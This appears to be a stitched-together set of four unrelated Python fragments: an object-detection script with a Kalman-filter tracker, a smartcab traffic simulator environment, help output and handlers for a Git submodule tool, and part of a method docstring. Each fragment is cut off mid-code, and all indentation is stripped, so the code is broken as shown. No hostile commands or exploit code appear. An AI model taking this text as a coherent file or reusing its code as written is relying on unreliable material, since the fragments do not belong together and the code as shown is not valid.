PATH_TO_VIDEO = os.path.join(CWD_PATH,VIDEO_NAME)
# Number of classes the object detector can identify
NUM_CLASSES = 6
# Load the label map.
# Label maps map indices to category names, so that when our convolution
# network predicts `5`, we know that this corresponds to `king`.
# Here we use internal utility functions, but anything that returns a
# dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load the Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
# Define input and output tensors (i.e. data) for the object detection classifier
# Input tensor is the image
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Open video file
video = cv2.VideoCapture(PATH_TO_VIDEO)
# https://stackoverflow.com/questions/37695376/python-and-opencv-getting-the-duration-time-of-a-video-at-certain-points
length = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
fps = video.get(cv2.CAP_PROP_FPS)
# KF sampling rate
# T = 1./fps
T = 1
print ("[INFO] Video rate: {:2f} fps".format(fps))
print ("[INFO] Video length: {} frames".format(length))
# get vcap property
# width = video.get(cv2.CV_CAP_PROP_FRAME_WIDTH) # float
# height = video.get(cv2.CV_CAP_PROP_FRAME_HEIGHT) # float
# https://www.rapidtables.com/web/color/RGB_Color.html
colors = dict({
"red": (0, 0, 255),
"green": (0, 255, 0),
"blue": (255, 0, 0),
"black":(0, 0, 0),
"white":(255, 255, 255),
"yellow":(255, 255, 0),
"cyan":(0, 255, 255),
"magenta":(255, 0, 255),
"silver":(192, 192, 192),
"gray":(128, 128, 128),
"maroon":(128, 0, 0),
"olive":(128, 128, 0),
"purple":(255, 0, 255),
"teal":(0, 128, 128),
"navy":(0, 0, 128)})
color_key = []
for key in colors:
color_key.append(key)
"""
State update matrices
"""
F = np.matrix( ((1, 0, T, 0),(0, 1, 0, T),(0, 0, 1, 0),(0, 0, 0, 1)) )
G = np.matrix( ((T**2/2),(T**2/2), T, T)).transpose()
H = np.matrix( ((1,0,0,0),(0,1,0,0)) ) # measurement function applied to the state estimate X_hat to get the expected next/new measurement
u = .005 #define acceleration magnitude
"""
Covariance matrices
"""
Sigma_v = .05; #process noise: the variability in how fast the ASARP_marker is speeding up (stdv of acceleration: meters/sec^2)
tkn_x = 1; #measurement noise in the horizontal direction (x axis).
tkn_y = 1; #measurement noise in the horizontal direction (y axis).
Ez = np.matrix(((tkn_x,0),(0,tkn_y)))*.5**2
Ex = np.matrix( ((T**4/4,0,T**3/2,0),(0,T**4/4,0,T**3/2),(T**3/2,0,T**2,0),(0,T**3/2,0,T**2)) )*Sigma_v**2# Ex convert the process noise (stdv) into covariance matrix
P = [Ex]*14; # estimate of initial position variance (covariance matrix)
bboxes_i = []
bboxes_i_1 = []
# https://stackoverflow.com/questions/10617045/how-to-create-a-fix-size-list-in-python
# bboxes_swap = [xmin, ymin, xmax, ymax]
bboxes_swap = [[0.0 , 0.0, 0.0, 0.0]]*14
bboxes_hat = [np.matrix( (0., 0., 0., 0.) ).transpose()]*14
K = [[0.]]*14
swap_flag = [False]*14
frame_cnt = 0
'''
Files for debuggin KF
'''
outfile = open('./ANN_0.csv','w')
writer=csv.writer(outfile)
while(video.isOpened()):
# Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
# i.e. a single-column array, where each item in the column has the pixel RGB value
ret, frame = video.read()
width = int(video.get(3))
height = int(video.get(4))
frame_expanded = np.expand_dims(frame, axis=0)
start = time.time()
# Perform the actual detection by running the model with the image as input
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: frame_expanded})
end = time.time()
## https://stackoverflow.com/questions/26938799/printing-variables-in-python-3-4
print ("[INFO] Object detection took {:.2f} ms" .format((end-start)*1000))
# cv2.putText(frame, "Ts: {}ms".format((end-start)*1000),(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 255, 0), 2)
# Draw the results of the detection (aka 'visualize the results')
# vis_util.visualize_boxes_and_labels_on_image_array(
# frame,
# np.squeeze(boxes),
# np.squeeze(classes).astype(np.int32),
# np.squeeze(scores),
# category_index,
# use_normalized_coordinates=True,
# line_thickness=2,
# min_score_thresh=0.35)
bboxes_i = []
# print(len(boxes[0][:]))
for i in range(len(boxes[0][:])):
if scores[0][i] > 0.5: #uncertainty
bboxes_i.append(boxes[0][i])
# print("[DEBUG] Index counter:{}".format(i))
M = len(bboxes_i[:])
print("[DEBUG] M vector size: {}".format(M))
if (M >= 15):
print("[WARNING] M vector size is greater that the original setpoints number")
min_flag = None # not necessary
# bboxes_swap = []
Euc_min = 0
if (frame_cnt > 0):
##HELP: comparisson between bboxes(k-1) e bboxes(k)
for m in range(len(bboxes_i_1[:])):
ymin_p = bboxes_i_1[m][0]*height
xmin_p = bboxes_i_1[m][1]*width
ymax_p = bboxes_i_1[m][2]*height
xmax_p = bboxes_i_1[m][3]*width
x_avg_p = int(xmin_p + (xmax_p-xmin_p)/2)
y_avg_p = int(ymin_p + (ymax_p-ymin_p)/2)
# rad_avg_p = math.sqrt(((xmax_p-xmin_p)/2)**2 + ((ymax_p-ymin_p)/2)**2)
## ind_cnt = 0
# print("[DEBUG] Vector size:{}".format(len(bboxes_i[:])))
for n in range(len(bboxes_i[:])):
ymin_q = bboxes_i[n][0]*height
xmin_q = bboxes_i[n][1]*width
ymax_q = bboxes_i[n][2]*height
xmax_q = bboxes_i[n][3]*width
x_avg_q = int(xmin_q + (xmax_q-xmin_q)/2)
y_avg_q = int(ymin_q + (ymax_q-ymin_q)/2)
# rad_avg_q = math.sqrt(((xmax_q-xmin_q)/2)**2 + ((ymax_q-ymin_q)/2)**2)
d_euc = math.sqrt(((x_avg_q-x_avg_p))**2 + ((y_avg_q-y_avg_p))**2)
# print("[DEBUG] Euc_distance: {:.2f}".format(d_euc))
#gravar index com a menor distancia
if(d_euc < 7.0):
min_index = n
min_flag = True
Euc_min = d_euc
# print("[DEBUG] Index counter:{}".format(n))
# if min_flag:
if (min_flag and (swap_flag[min_index]==False)):
# if (min_index==1):
# # Predict next state of the asarp_marker with the last state and predicted motion.
# x_hat = F*x_hat + G*u;
# # predic_state = [predic_state; x_hat(1)] ;
# # predict next covariance
# P = F*P*F.T + Ex;
# # predic_var = [predic_var; P] ;
# # predicted measurement covariance
# # Kalman Gain
# K = P*H.T*linalg.inv(H*P*H.T + Ez);
# # Update the state estimate
# z = np.matrix( (x_avg_q, y_avg_q) ).transpose()
# writer.writerow([x_avg_q,y_avg_q])
# x_hat = x_hat + K*(z - H*x_hat);
# print("predicted state for bboxes[0]: {}" .format(x_hat))
# # update covariance estimation.
# P = (np.identity(4) - K*H)*P;
#inserir a lista bboxes_swap na posição [m] (mantendo a posição original )
# bboxes_swap.append(bboxes_i[min_index])
swap_flag[min_index] = True
bboxes_swap[m] = bboxes_i[min_index]
print("[DEBUG] Euc_distance: {:.2f}".format(Euc_min))
print("[DEBUG] Index: {}".format(min_index))
print("------------------------------------------------------------")
min_flag = False
# print("[DEBUG] Euclidean distance: {:.2f}".format(d_euc))
for swp_i in range(len(swap_flag[:])):
swap_flag[swp_i] = False
else:
#na iteração i=0 bboxes_swap pode ser uma copia do bboxes_i ou seja bboxes_i_!
ymin_dot = bboxes_i[5][0]*height
xmin_dot = bboxes_i[5][1]*width
ymax_dot = bboxes_i[5][2]*height
xmax_dot = bboxes_i[5][3]*width
x_dot_avg = int(xmin_dot + (xmax_dot-xmin_dot)/2)
y_dot_avg = int(ymin_dot + (ymax_dot-ymin_dot)/2)
x_hat = np.matrix( (x_dot_avg, y_dot_avg, 0, 0) ).transpose()
# bboxes_swap = bboxes_i
for idx in range(len(bboxes_i[:])):
ymin_dot = bboxes_i[idx][0]*height
xmin_dot = bboxes_i[idx][1]*width
ymax_dot = bboxes_i[idx][2]*height
xmax_dot = bboxes_i[idx][3]*width
x_dot_avg = int(xmin_dot + (xmax_dot-xmin_dot)/2)
y_dot_avg = int(ymin_dot + (ymax_dot-ymin_dot)/2)
print("index_cnt: {}".format(idx))
bboxes_swap[idx] = bboxes_i[idx]
#initial value for estimation scheme
bboxes_hat[idx][0] = x_dot_avg
bboxes_hat[idx][1] = y_dot_avg
if (frame_cnt > 0):
for k in range(len(bboxes_swap[:])):
ymin_k = bboxes_swap[k][0]*height
xmin_k = bboxes_swap[k][1]*width
ymax_k = bboxes_swap[k][2]*height
xmax_k = bboxes_swap[k][3]*width
x_avg_k = int(xmin_k + (xmax_k-xmin_k)/2)
y_avg_k = int(ymin_k + (ymax_k-ymin_k)/2)
# Predict next state of the asarp_marker with the last state and predicted motion.
# x_hat = F*x_hat + G*u;
bboxes_hat[k] = F*bboxes_hat[k] + G*u;
# predic_state = [predic_state; x_hat(1)] ;
# predict next covariance
# P = F*P*F.T + Ex;
P[k] = F*P[k]*F.T + Ex;
# predic_var = [predic_var; P] ;
# predicted measurement covariance
# <NAME>
# K = P*H.T*linalg.inv(H*P*H.T + Ez);
K[k] = P[k]*H.T*linalg.inv(H*P[k]*H.T + Ez);
# Update the state estimate
z = np.matrix( (x_avg_k, y_avg_k) ).transpose()
writer.writerow([x_avg_k,y_avg_k])
# x_hat = x_hat + K*(z - H*x_hat);
bboxes_hat[k] = bboxes_hat[k] + K[k]*(z - H*bboxes_hat[k]);
print("[DEBUG] predicted state for bboxes[0]: {}" .format(x_hat))
# update covariance estimation.
P[k] = (np.identity(4) - K[k]*H)*P[k];
# print("Swap vector size: {} ".format(len(bboxes_swap[:])))
frame_cnt = frame_cnt + 1
| |
import time
import random
import math
from collections import OrderedDict
from simulator import Simulator
class TrafficLight(object):
"""A traffic light that switches periodically."""
valid_states = [True, False] # True = NS open; False = EW open
def __init__(self, state=None, period=None):
self.state = state if state is not None else random.choice(self.valid_states)
self.period = period if period is not None else random.choice([2, 3, 4, 5])
self.last_updated = 0
def reset(self):
self.last_updated = 0
def update(self, t):
if t - self.last_updated >= self.period:
self.state = not self.state # Assuming state is boolean
self.last_updated = t
class Environment(object):
"""Environment within which all agents operate."""
valid_actions = [None, 'forward', 'left', 'right']
valid_inputs = {'light': TrafficLight.valid_states, 'oncoming': valid_actions, 'left': valid_actions, 'right': valid_actions}
valid_headings = [(1, 0), (0, -1), (-1, 0), (0, 1)] # E, N, W, S
hard_time_limit = -100 # Set a hard time limit even if deadline is not enforced.
def __init__(self, verbose=False, num_dummies=100, grid_size = (8, 6)):
self.num_dummies = num_dummies # Number of dummy driver agents in the environment
self.verbose = verbose # If debug output should be given
# Initialize simulation variables
self.done = False
self.t = 0
self.agent_states = OrderedDict()
self.step_data = {}
self.success = None
# Road network
self.grid_size = grid_size # (columns, rows)
self.bounds = (1, 2, self.grid_size[0], self.grid_size[1] + 1)
self.block_size = 100
self.hang = 0.6
self.intersections = OrderedDict()
self.roads = []
for x in xrange(self.bounds[0], self.bounds[2] + 1):
for y in xrange(self.bounds[1], self.bounds[3] + 1):
self.intersections[(x, y)] = TrafficLight() # A traffic light at each intersection
for a in self.intersections:
for b in self.intersections:
if a == b:
continue
if (abs(a[0] - b[0]) + abs(a[1] - b[1])) == 1: # L1 distance = 1
self.roads.append((a, b))
# Add environment boundaries
for x in xrange(self.bounds[0], self.bounds[2] + 1):
self.roads.append(((x, self.bounds[1] - self.hang), (x, self.bounds[1])))
self.roads.append(((x, self.bounds[3] + self.hang), (x, self.bounds[3])))
for y in xrange(self.bounds[1], self.bounds[3] + 1):
self.roads.append(((self.bounds[0] - self.hang, y), (self.bounds[0], y)))
self.roads.append(((self.bounds[2] + self.hang, y), (self.bounds[2], y)))
# Create dummy agents
for i in xrange(self.num_dummies):
self.create_agent(DummyAgent)
# Primary agent and associated parameters
self.primary_agent = None # to be set explicitly
self.enforce_deadline = False
# Trial data (updated at the end of each trial)
self.trial_data = {
'testing': False, # if the trial is for testing a learned policy
'initial_distance': 0, # L1 distance from start to destination
'initial_deadline': 0, # given deadline (time steps) to start with
'net_reward': 0.0, # total reward earned in current trial
'final_deadline': None, # deadline value (time remaining) at the end
'actions': {0: 0, 1: 0, 2: 0, 3: 0, 4: 0}, # violations and accidents
'success': 0 # whether the agent reached the destination in time
}
def create_agent(self, agent_class, *args, **kwargs):
""" When called, create_agent creates an agent in the environment. """
agent = agent_class(self, *args, **kwargs)
self.agent_states[agent] = {'location': random.choice(self.intersections.keys()), 'heading': (0, 1)}
return agent
def set_primary_agent(self, agent, enforce_deadline=False):
""" When called, set_primary_agent sets 'agent' as the primary agent.
The primary agent is the smartcab that is followed in the environment. """
self.primary_agent = agent
agent.primary_agent = True
self.enforce_deadline = enforce_deadline
def reset(self, testing=False):
""" This function is called at the beginning of a new trial. """
self.done = False
self.t = 0
# Reset status text
self.step_data = {}
# Reset traffic lights
for traffic_light in self.intersections.itervalues():
traffic_light.reset()
# Pick a start and a destination
start = random.choice(self.intersections.keys())
destination = random.choice(self.intersections.keys())
# Ensure starting location and destination are not too close
while self.compute_dist(start, destination) < 4:
start = random.choice(self.intersections.keys())
destination = random.choice(self.intersections.keys())
start_heading = random.choice(self.valid_headings)
distance = self.compute_dist(start, destination)
deadline = distance * 5 # 5 time steps per intersection away
if(self.verbose == True): # Debugging
print "Environment.reset(): Trial set up with start = {}, destination = {}, deadline = {}".format(start, destination, deadline)
# Create a map of all possible initial positions
positions = dict()
for location in self.intersections:
positions[location] = list()
for heading in self.valid_headings:
positions[location].append(heading)
# Initialize agent(s)
for agent in self.agent_states.iterkeys():
if agent is self.primary_agent:
self.agent_states[agent] = {
'location': start,
'heading': start_heading,
'destination': destination,
'deadline': deadline
}
# For dummy agents, make them choose one of the available
# intersections and headings still in 'positions'
else:
intersection = random.choice(positions.keys())
heading = random.choice(positions[intersection])
self.agent_states[agent] = {
'location': intersection,
'heading': heading,
'destination': None,
'deadline': None
}
# Now delete the taken location and heading from 'positions'
positions[intersection] = list(set(positions[intersection]) - set([heading]))
if positions[intersection] == list(): # No headings available for intersection
del positions[intersection] # Delete the intersection altogether
agent.reset(destination=(destination if agent is self.primary_agent else None), testing=testing)
if agent is self.primary_agent:
# Reset metrics for this trial (step data will be set during the step)
self.trial_data['testing'] = testing
self.trial_data['initial_deadline'] = deadline
self.trial_data['final_deadline'] = deadline
self.trial_data['net_reward'] = 0.0
self.trial_data['actions'] = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0}
self.trial_data['parameters'] = {'e': agent.epsilon, 'a': agent.alpha}
self.trial_data['success'] = 0
def step(self):
""" This function is called when a time step is taken turing a trial. """
# Pretty print to terminal
print ""
print "/-------------------"
print "| Step {} Results".format(self.t)
print "\-------------------"
print ""
if(self.verbose == True): # Debugging
print "Environment.step(): t = {}".format(self.t)
# Update agents, primary first
if self.primary_agent is not None:
self.primary_agent.update()
for agent in self.agent_states.iterkeys():
if agent is not self.primary_agent:
agent.update()
# Update traffic lights
for intersection, traffic_light in self.intersections.iteritems():
traffic_light.update(self.t)
if self.primary_agent is not None:
# Agent has taken an action: reduce the deadline by 1
agent_deadline = self.agent_states[self.primary_agent]['deadline'] - 1
self.agent_states[self.primary_agent]['deadline'] = agent_deadline
if agent_deadline <= self.hard_time_limit:
self.done = True
self.success = False
if self.verbose: # Debugging
print "Environment.step(): Primary agent hit hard time limit ({})! Trial aborted.".format(self.hard_time_limit)
elif self.enforce_deadline and agent_deadline <= 0:
self.done = True
self.success = False
if self.verbose: # Debugging
print "Environment.step(): Primary agent ran out of time! Trial aborted."
self.t += 1
def sense(self, agent):
""" This function is called when information is requested about the sensor
inputs from an 'agent' in the environment. """
assert agent in self.agent_states, "Unknown agent!"
state = self.agent_states[agent]
location = state['location']
heading = state['heading']
light = 'green' if (self.intersections[location].state and heading[1] != 0) or ((not self.intersections[location].state) and heading[0] != 0) else 'red'
# Populate oncoming, left, right
oncoming = None
left = None
right = None
for other_agent, other_state in self.agent_states.iteritems():
if agent == other_agent or location != other_state['location'] or (heading[0] == other_state['heading'][0] and heading[1] == other_state['heading'][1]):
continue
# For dummy agents, ignore the primary agent
# This is because the primary agent is not required to follow the waypoint
if other_agent == self.primary_agent:
continue
other_heading = other_agent.get_next_waypoint()
if (heading[0] * other_state['heading'][0] + heading[1] * other_state['heading'][1]) == -1:
if oncoming != 'left': # we don't want to override oncoming == 'left'
oncoming = other_heading
elif (heading[1] == other_state['heading'][0] and -heading[0] == other_state['heading'][1]):
if right != 'forward' and right != 'left': # we don't want to override right == 'forward or 'left'
right = other_heading
else:
if left != 'forward': # we don't want to override left == 'forward'
left = other_heading
return {'light': light, 'oncoming': oncoming, 'left': left, 'right': right}
def get_deadline(self, agent):
""" Returns the deadline remaining for an agent. """
return self.agent_states[agent]['deadline'] if agent is self.primary_agent else None
def act(self, agent, action):
""" Consider an action and perform the action if it is legal.
Receive a reward for the agent based on traffic laws. """
assert agent in self.agent_states, "Unknown agent!"
assert action in self.valid_actions, "Invalid action!"
state = self.agent_states[agent]
location = state['location']
heading = state['heading']
light = 'green' if (self.intersections[location].state and heading[1] != 0) or ((not self.intersections[location].state) and heading[0] != 0) else 'red'
inputs = self.sense(agent)
# Assess whether the agent can move based on the action chosen.
# Either the action is okay to perform, or falls under 4 types of violations:
# 0: Action okay
# 1: Minor traffic violation
# 2: Major traffic violation
# 3: Minor traffic violation | |
in aliases['add']):
print(
"PARAMETERS list of local paths to Git repositories. No effect if"
" no path is given."
)
print(
"EFFECT updates the description file to include each path so that"
" it matches their current state."
)
print(
"EXAMPLE 'add ./my/src/local_clone' adds a description of the"
" repository at ./my/src/local_clone to the description file."
)
print("ALIASES " + ', '.join(aliases['add']) + ".")
return
if (command in aliases['foreach']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule. The command"
" is executed from the parent repository and a number of"
" environment variables are declared for each execution, as"
" described below (according to what is in the description file):"
)
print("ENVVAR SNSM_COMMIT is the commit for this submodule.")
print(
"ENVVAR SNSM_ENABLED is 1 if the submodule is enabled, 0 otherwise."
)
print(
"ENVVAR SNSM_SOURCES is a newline separated list of anonymous"
" sources for the submodule."
)
print(
"ENVVAR SNSM_NAMED_SOURCES is a newline separated list of named"
" sources for the submodule. Each entry is first the name, a space,"
" then the source."
)
print(
"ENVVAR SNSM_TARGET_TYPE is the target type for this submodule."
" 'commit', 'branch', and 'tag' are all 3 possible values."
)
print(
"ENVVAR SNSM_TARGET is the actual target for this submodule."
" It is equal to SNSM_COMMIT if SNSM_TARGET_TYPE is 'commit'."
)
print(
"ENVVAR SNSM_TARGET_OVERRIDES_COMMIT is 1 if the submodule is"
" configured to use the target instead of the commit, 0 otherwise."
)
print("ENVVAR SNSM_ROOT is an absolute path to the root repository.")
print("ENVVAR SNSM_ABSOLUTE_PATH is an absolute path to the submodule.")
print(
"ENVVAR SNSM_PATH is a path to the submodule relative to the"
" direct parent repository."
)
print(
"ENVVAR SNSM_PARENT is an absolute path to the direct parent"
" repository."
)
print(
"ENVVAR SNSM_PARENTS is a newline separated list of absolute path"
" to each of the parent repositories."
)
print("EXAMPLE foreach ./my/src/local_clone \"echo $SNSM_PATH\"")
print("ALIASES " + ', '.join(aliases['foreach']) + ".")
return
if (command in aliases['foreach-enabled']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule, provided"
" they are enabled. See 'help foreach' for more details."
)
print(
"EXAMPLE foreach-enabled ./my/src/local_clone \"echo $SNSM_PATH\""
)
print("ALIASES " + ', '.join(aliases['foreach-enabled']) + ".")
return
if (command in aliases['foreach-enabled-recursive']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule, provided"
" they are enabled. The execution recurses into each such"
" submodule. See 'help foreach' for more details."
)
print(
"EXAMPLE foreach-enabled-recursive ./my/src/local_clone"
" \"echo $SNSM_PATH\""
)
print(
"ALIASES " + ', '.join(aliases['foreach-enabled-recursive']) + "."
)
return
if (command in aliases['foreach-recursive']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" descriptionfile if no path is given."
)
print(
"EFFECT executes the shell command for each submodule. The"
" execution recurses into each submodule. See 'help foreach' for"
" more details."
)
print(
"EXAMPLE foreach-recursive ./my/src/local_clone \"echo $SNSM_PATH\""
)
print("ALIASES " + ', '.join(aliases['foreach-recursive']) + ".")
return
if (command in aliases['from-official']):
# TODO
print("EXAMPLE from-official ./my/official/gitsubmodule")
print("ALIASES " + ', '.join(aliases['from-official']) + ".")
return
if (command in aliases['list']):
print(
"PARAMETERS list of local paths. The root repository's path is"
" selected if no path is given"
)
print("EFFECT lists all submodules in those directories.")
print("EXAMPLE list")
print("EXAMPLE list ./my")
print("EXAMPLE list ./my my_other_folder")
print("ALIASES " + ', '.join(aliases['list']) + ".")
return
if (command in aliases['match-target']):
print(
"PARAMETERS list of paths to submodules. All described submodules"
" are selected if no path is given."
)
print(
"EFFECT updates the submodule's local copy to match the"
" submodule's target (instead of its commit) regardless of the"
" 'target_overrides_commit' parameter, then updates the submodule's"
" description so that it matches the updated local copy."
)
print("EXAMPLE match-target")
print("EXAMPLE match-target ./*")
print("EXAMPLE match-target ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['match-target']) + ".")
return
if (command in aliases['rm']):
# TODO
print("EXAMPLE remove ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm']) + ".")
return
if (command in aliases['rm-desc']):
# TODO
print("EXAMPLE remove-description ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm-desc']) + ".")
return
if (command in aliases['rm-dir']):
# TODO
print("EXAMPLE remove-description ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm-dir']) + ".")
return
if (command in aliases['seek']):
# TODO
print("EXAMPLE seek /my/src/")
print("ALIASES " + ', '.join(aliases['seek']) + ".")
return
if (command in aliases['status']):
# TODO
print("EXAMPLE status /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['status']) + ".")
return
if (command in aliases['to-official']):
# TODO
print("EXAMPLE to-official /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['to-official']) + ".")
return
if (command in aliases['up-desc']):
# TODO
print("EXAMPLE update-description /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['up-desc']) + ".")
return
if (command in aliases['up-dir']):
# TODO
print("EXAMPLE update-directory /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['up-dir']) + ".")
return
print("[F] Unknown command \"" + command + "\".", file = sys.stderr)
handle_generic_help(invocation)
sys.exit(-1)
################################################################################
##### ADD ######################################################################
################################################################################
def handle_add_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
for path in paths:
if (path not in submodule_dictionary):
new_module = GitSubmodule(path)
submodule_dictionary[path] = new_module
submodule_list.append(new_module)
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_update_desc_to(submodule_dictionary, root_directory)
update_submodules_desc_file(root_directory, submodule_dictionary, [])
print("Updated description written.")
git_add_to_gitignore(
set([path for path in submodule_dictionary]),
root_directory
)
################################################################################
##### FOREACH ##################################################################
################################################################################
def handle_foreach_command (parameters, is_recursive, is_enabled_only):
if (len(parameters) == 0):
print(
"[F] This command requires at least one parameter.",
file = sys.stderr
)
handle_help_command(sys.argv[0], [sys.argv[1]])
sys.exit(-1)
foreach_command = parameters.pop()
paths = parameters
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_foreach_to(
submodule_dictionary,
is_recursive,
is_enabled_only,
[root_directory], # = traversed_submodules
foreach_command,
root_directory
)
################################################################################
##### FROM OFFICIAL ############################################################
################################################################################
def handle_from_official_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
if (len(paths) == 0):
print("Shallow initialization of all Official Git Submodules...")
git_shallow_submodule_init(root_directory, ".")
print("Done.")
paths = git_get_official_submodule_paths(root_directory)
else:
for path in paths:
print(
"Shallow Official Git Submodule initialization for \""
+ path
+ "\"..."
)
git_shallow_submodule_init(root_directory, path)
print("Done.")
if (path not in git_get_official_submodule_paths(root_directory)):
print(
"[F] No Official Git Submodule registered at \""
+ path
+ "\".",
file = sys.stderr
)
sys.exit(-1)
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
for path in paths:
if (path not in submodule_dictionary):
new_module = GitSubmodule(path)
submodule_dictionary[path] = new_module
submodule_list.append(new_module)
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_update_desc_to(submodule_dictionary, root_directory)
update_submodules_desc_file(root_directory, submodule_dictionary, [])
print("Updated description written.")
git_add_to_gitignore(
set([path for path in submodule_dictionary]),
root_directory
)
################################################################################
##### REMOVE ###################################################################
################################################################################
def handle_remove_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
update_submodules_desc_file(root_directory, dict(), paths)
apply_clear_to(submodule_dictionary, root_directory)
git_remove_from_gitignore(paths, root_directory)
################################################################################
##### REMOVE DESCRIPTION #######################################################
################################################################################
def handle_remove_description_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
update_submodules_desc_file(root_directory, dict(), paths)
git_remove_from_gitignore(paths, root_directory)
################################################################################
##### REMOVE DIRECTORY #########################################################
################################################################################
def handle_remove_directory_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_clear_to(submodule_dictionary, root_directory)
################################################################################
##### SEEK #####################################################################
################################################################################
def handle_seek_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
| |
`INPUT` Node is used as its input on `TRIAL <TimeScale.TRIAL>`
num_trials : int : default 1
typically, the composition will infer the number of trials from the length of its input specification.
To reuse the same inputs across many trials, you may specify an input dictionary with lists of length 1,
or use default inputs, and select a number of trials with num_trials.
initialize_cycle_values : Dict { Node: Node Value } : default None
sets the value of specified `Nodes <Composition_Nodes>` before the start of the run. All specified
Nodes must be in a `cycle <Composition_Graph>` (i.e., designated with with `NodeRole` `CYCLE
<NodeRoles.CYCLE>`; otherwise, a warning is issued and the specification is ignored). If a Node in
a cycle is not specified, it is assigned its `default values <Parameter_Defaults>` when initialized
(see `Composition_Cycles_and_Feedback` additional details).
reset_stateful_functions_to : Dict { Node : Object | iterable [Object] } : default None
object or iterable of objects to be passed as arguments to nodes' reset methods when their
respective reset_stateful_function_when conditions are met. These are used to seed the stateful attributes
of Mechanisms that have stateful functions. If a node's reset_stateful_function_when condition is set to
Never, but they are listed in the reset_stateful_functions_to dict, then they will be reset once at the
beginning of the run, using the provided values. For a more in depth explanation of this argument, see
`Resetting Parameters of StatefulFunctions <Composition_Reset>`.
reset_stateful_functions_when : Dict { Node: Condition } | Condition : default Never()
if type is dict, sets the reset_stateful_function_when attribute for each key Node to its corresponding value
Condition. if type is Condition, sets the reset_stateful_function_when attribute for all nodes in the
Composition that currently have their reset_stateful_function_when conditions set to `Never <Never>`.
in either case, the specified Conditions persist only for the duration of the run, after which the nodes'
reset_stateful_functions_when attributes are returned to their previous Conditions. For a more in depth
explanation of this argument, see `Resetting Parameters of StatefulFunctions <Composition_Reset>`.
skip_initialization : bool : default False
clamp_input : enum.Enum[SOFT_CLAMP|HARD_CLAMP|PULSE_CLAMP|NO_CLAMP] : default SOFT_CLAMP
specifies how inputs are handled for the Composition's `INPUT` `Nodes <Composition_Nodes>`.
COMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
runtime_params : Dict[Node: Dict[Parameter: Tuple(Value, Condition)]] : default None
nested dictionary of (value, `Condition`) tuples for parameters of Nodes (`Mechanisms <Mechanism>` or
`Compositions <Composition>` of the Composition; specifies alternate parameter values to be used only
during this `RUN` when the specified `Condition` is met (see `Composition_Runtime_Params` for
additional informaton).
call_before_time_step : callable : default None
